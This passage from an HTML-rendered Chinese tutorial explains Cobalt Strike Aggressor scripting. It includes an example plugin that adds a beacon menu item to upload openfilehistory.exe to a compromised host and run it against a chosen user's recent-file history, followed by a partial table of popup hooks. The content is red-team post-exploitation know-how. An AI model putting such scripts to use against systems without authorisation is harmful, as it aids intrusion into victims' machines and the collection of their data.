0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">更多函数见</span></p><p cid="n138" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#dbutton_action" target="_blank">https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#dbutton_action</a></span></p><h2 cid="n139" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">实例分析</span></h2><p cid="n140" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">最后简单看一个实例，调用某程序上传到目标上并执行某命令，算是比较常见的需求了</span></p><pre spellcheck="false" lang="perl" cid="n141" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">https</span>:<span style="box-sizing: border-box;color: rgb(152, 26, 26);">//</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">github</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">com</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(17, 102, 68);">422926799</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">csplugin</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">blob</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">master</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">%E5%8F%96%E8%AF%81</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">/</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">qz</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">cna</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(119, 0, 136);">sub</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">recentqueryfunc</span>{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">$path</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">script_resource</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"openfilehistory.exe"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">bupload</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$3</span>[<span style="box-sizing: border-box;color: rgb(170, 17, 17);">'bid'</span>], <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$path</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">bshell</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$3</span>[<span style="box-sizing: border-box;color: rgb(170, 17, 17);">'bid'</span>], <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"openfilehistory.exe $3['username']"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(119, 0, 136);">sub</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">recentquery</span>{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">$dialog</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">dialog</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"最近使用痕迹查询"</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">%</span>(<span style="box-sizing: border-box;color: rgb(85, 85, 85);">username</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=></span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Administrator"</span>, <span style="box-sizing: border-box;color: rgb(85, 85, 85);">bid</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=></span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$id</span>), <span style="box-sizing: border-box;color: rgb(0, 0, 0);">&recentqueryfunc</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">dialog_description</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$dialog</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"要查询的用户名输入"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">drow_text</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$dialog</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"username"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"USERNAME:"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">dbutton_action</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$dialog</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"run"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">dialog_show</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$dialog</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">popup</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">beacon_bottom</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">menu</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"windows取证"</span>{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">$bid</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>; </span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"最近使用痕迹"</span>{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">foreach</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$id</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$bid</span>){</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">recentquery</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$id</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span>}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span>}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><p cid="n142" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">这里的bid就是我们的beacon id，原因是cs hook了不同的对象弹出并提供了参数变量</span></p><p cid="n143" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">具体看这个表格</span></p><figure cid="n144" mdtype="table" style="box-sizing: border-box;margin-top: 1.2em;margin-bottom: 1.2em;overflow-x: auto;cursor: default;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><table width="750"><thead style="box-sizing: border-box;break-inside: avoid;break-after: auto;background-color: rgb(248, 248, 248);"><tr cid="n145" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><th style="box-sizing: border-box;padding: 6px 13px;border-top-width: 1px;border-bottom: 0px;border-top-color: rgb(223, 226, 229);border-right-color: rgb(223, 226, 229);border-left-color: rgb(223, 226, 229);text-align: left;"><span cid="n146" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Hook</span></span></th><th style="box-sizing: border-box;padding: 6px 13px;border-top-width: 1px;border-bottom: 0px;border-top-color: rgb(223, 226, 229);border-right-color: rgb(223, 226, 229);border-left-color: rgb(223, 226, 229);text-align: left;"><span cid="n147" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Where</span></span></th><th style="box-sizing: border-box;padding: 6px 13px;border-top-width: 1px;border-bottom: 0px;border-top-color: rgb(223, 226, 229);border-right-color: rgb(223, 226, 229);border-left-color: rgb(223, 226, 229);text-align: left;"><span cid="n148" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Arguments</span></span></th></tr></thead><tbody style="box-sizing: border-box;"><tr cid="n149" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n150" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">aggressor</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n151" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">Cobalt Strike</strong></span><span md-inline="plain" style="box-sizing: border-box;"> Menu</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr><tr cid="n153" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n154" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">attacks</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n155" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">Attacks</strong></span><span md-inline="plain" style="box-sizing: border-box;"> Menu</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr><tr cid="n157" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n158" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">beacon</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n159" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[session]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n160" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected beacon IDs (array)</span></span></td></tr><tr cid="n161" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n162" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">beacon_top</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n163" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[session]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n164" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected beacon IDs (array)</span></span></td></tr><tr cid="n165" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n166" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">beacon_bottom</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n167" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[session]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n168" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected beacon IDs (array)</span></span></td></tr><tr cid="n169" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n170" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">credentials</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n171" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Credential Browser</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n172" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected credential rows (array of hashes)</span></span></td></tr><tr cid="n173" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n174" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">filebrowser</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n175" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[file in file browser]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n176" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = beacon ID, $2 = folder, $3 = selected files (array)</span></span></td></tr><tr cid="n177" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n178" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">help</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n179" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">Help</strong></span><span md-inline="plain" style="box-sizing: border-box;"> Menu</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr><tr cid="n181" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n182" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">listeners</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n183" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Listeners table</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n184" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected listener names (array)</span></span></td></tr><tr cid="n185" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n186" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">pgraph</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n187" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[pivot graph]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr><tr cid="n189" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n190" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">processbrowser</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n191" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Process Browser</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n192" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = Beacon ID, $2 = selected processes (array)</span></span></td></tr><tr cid="n193" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n194" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">processbrowser_multi</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n195" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">Multi-Session Process Browser</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n196" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected processes (array)</span></span></td></tr><tr cid="n197" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n198" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">reporting</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n199" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">Reporting</strong></span><span md-inline="plain" style="box-sizing: border-box;"> Menu</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr><tr cid="n201" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n202" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">ssh</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n203" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[SSH session]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n204" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected session IDs (array)</span></span></td></tr><tr cid="n205" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n206" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">targets</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n207" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[host]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n208" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected hosts (array)</span></span></td></tr><tr cid="n209" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);background-color: rgb(248, 248, 248);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n210" mdtype="table_cell" 